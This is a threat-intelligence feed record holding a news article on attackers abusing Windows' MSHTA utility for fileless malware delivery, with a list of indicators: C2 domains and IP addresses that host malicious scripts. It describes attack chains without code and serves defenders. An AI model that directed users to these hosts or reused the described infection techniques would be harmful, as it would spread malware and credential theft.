[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRwznJmDcSGHelTIJIOUbQ7_l41Yoj_1XK66KBHSI8jk":3},{"article":4,"iocs":43},{"id":5,"title":6,"slug":7,"summary":8,"ai_summary":9,"brief":10,"full_text":11,"url":12,"image_url":13,"published_at":14,"ingested_at":15,"relevance_score":16,"entities":17,"category_id":30,"category":31,"article_tags":35},"35049e94-947e-4d68-a36e-342cb9026f0d","Microsoft’s Retired IE Tool MSHTA Now Being Used in Fileless Malware Attacks","microsoft-s-retired-ie-tool-mshta-now-being-used-in-fileless-malware-attacks-de5713","Despite Internet Explorer’s retirement, hackers are abusing the legacy MSHTA utility in stealthy fileless malware attacks targeting Windows users.","Threat actors are exploiting the legacy MSHTA utility in Windows to conduct fileless malware attacks, even after Internet Explorer's retirement. Attackers use social engineering to deliver various malware types, including LummaStealer and ClipBanker, by abusing MSHTA to execute malicious code directly in memory.","Hackers abuse retired Internet Explorer tool MSHTA in fileless malware attacks targeting Windows users.","Security Malware MicrosoftMicrosoft’s Retired IE Tool MSHTA Now Being Used in Fileless Malware Attacks Despite Internet Explorer’s retirement, hackers are abusing the legacy MSHTA utility in stealthy fileless malware attacks targeting Windows users. byDeeba AhmedMay 21, 20262 minute read An old Windows tool called MSHTA is being exploited by hackers to infect systems with malware, reveals the latest research from Bitdefender. Reportedly, this tool, which was created to work with Internet Explorer (IE), still remains active by default on Windows computers despite IE’s retirement in 2022, mainly to help run older software smoothly. Attack Patterns Bitdefender’s research, shared with Hackread.com, highlights that threat actors are actively abusing it as a Living-off-the-Land binary (LOLBIN), enabling them to carry out fileless attacks. They can execute malicious VBScript and JavaScript code directly in the computer’s memory and ensure that it appears as legitimate administrative tasks. These fileless attack chains rely on common social engineering tricks like ClickFix scams and fake software downloads. Such as, in one campaign, fake Google ads for Claude Code were used to lure victims, and in another, attackers bundled malware into pirated downloads of the movie One Battle After Another. Typically, attackers force MSHTA to run a hidden command shell, checking specific IP addresses to execute malicious packages via Microsoft Installer. The Types of Threats Discovered Further investigation revealed that MSHTA helps deliver several different types of malware; some are designed to steal passwords, browser data, and cryptocurrency wallet information from unsuspecting users, while others are more advanced threats that can stay hidden on a computer for a long time to spy on users. For example, a program called CountLoader was seen using this method to drop information-stealing software like LummaStealer and Amatera onto devices. This involved using a zip archive with a legitimate Python interpreter renamed as Setup.exe to load a malicious script (.\\Lib\\encodings\\aliases.py), which launches a renamed MSHTA file (iso2022.exe) to connect to C2 domains like google-services.cc, explorer.vg, and ccleaner.gl. Similarly, Emmenhtal Loader uses phishing links on Discord to send victims to fake reCAPTCHA verification sites like humancheck.shop and eventually runs the LummaStealer payload. Another threat called PurpleFox uses this utility to quietly download a malicious MSI package disguised as a .png file (3EBCE3A4.png) for data theft. MSHTA is also abused by ClipBanker to hijack cryptocurrency wallet addresses via a remote file (checking.hta) that downloads persistence scripts named checking.ps1 and ichigo-lite.ps1.These scripts are fetched from the IP addresses 185.208.159.199 and 87.96.21.84, using scheduled tasks to be seen as legitimate services. However, researchers pointed out that not all instances of this activity are malicious because most detections actually stem from legitimate software updating its systems. CountLoader Killchain (Source: Bitdefender) “Not every MSHTA execution we observed was clearly malicious. A significant portion of detections came from DriverPack’s update mechanism… that downloads driver files from third-party sources rather than through official Microsoft update channels. This is an important reminder that MSHTA usage is not automatically malicious,” the blog post reads. Microsoft plans to fully retire VBScript by 2027, but there’s no public timeline given for its removal. Bitdefender, therefore, recommends that until it happens, organisations should restrict or block mshta.exe and wscript.exe in environments where they are not operationally required to stay safe. Deeba Ahmed Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage. View Posts Cyber AttackCybersecurityFilelessLOLBINMalwareMSHTAVulnerability Leave a Reply Cancel reply View Comments (0) Related Posts Security Social Media Technology Iranians’ sudden access to Facebook and Twitter a tech glitch, sites are blocked again Iranians were surprised to see Social media websites working inside the country without using any proxy server or… byWaqas Read More Security Data Breaches Leaks Privacy Facial DNA provider leaks biometric data via WordPress folder ChiceDNA exposed 8,000 sensitive records, including biometric images, personal details, and facial DNA data in an unsecured WordPress… byWaqas Malware Security Alert Users: MSN Main Page Dropping Malware on User PCs If you visit MSN.com there is a chance your PC has been affected with a malware — Outlook… byUzair Amir Read More Malware Security New ClickFix Attack Uses Fake Browser Fix to Install DarkGate Malware Researchers at Point Wild have discovered a new ClickFix attack campaign that tricks users into manually installing DarkGate malware via fake browser extension alerts. Learn how this attack bypasses security by using the Windows Run box and how you can stay safe. byDeeba Ahmed","https:\u002F\u002Fhackread.com\u002Fmicrosoft-retired-ie-tool-mshta-fileless-malware-attack\u002F","https:\u002F\u002Fhackread.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002Fmicrosoft-retired-ie-tool-mshta-fileless-malware-attack.jpg","2026-05-21T10:18:11+00:00","2026-05-21T12:00:21.326216+00:00",9,[18,21,23,25,28],{"name":19,"type":20},"Internet Explorer","product",{"name":22,"type":20},"MSHTA",{"name":24,"type":20},"Windows",{"name":26,"type":27},"Microsoft","vendor",{"name":29,"type":27},"Bitdefender","89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5",{"id":30,"icon":32,"name":33,"slug":34},null,"Malware","malware",[36,41],{"category":37},{"id":38,"icon":32,"name":39,"slug":40},"80544778-fabb-4dcd-aa35-17492e5dcf4f","Vulnerabilities","vulnerabilities",{"category":42},{"id":30,"icon":32,"name":33,"slug":34},[44,48,50,52,55,59],{"type":45,"value":46,"context":47},"domain","google-services.cc","C2 domain used by CountLoader",{"type":45,"value":49,"context":47},"explorer.vg",{"type":45,"value":51,"context":47},"ccleaner.gl",{"type":45,"value":53,"context":54},"humancheck.shop","Fake reCAPTCHA verification site used by Emmenhtal Loader",{"type":56,"value":57,"context":58},"ip","185.208.159.199","IP address hosting persistence scripts for ClipBanker",{"type":56,"value":60,"context":58},"87.96.21.84"]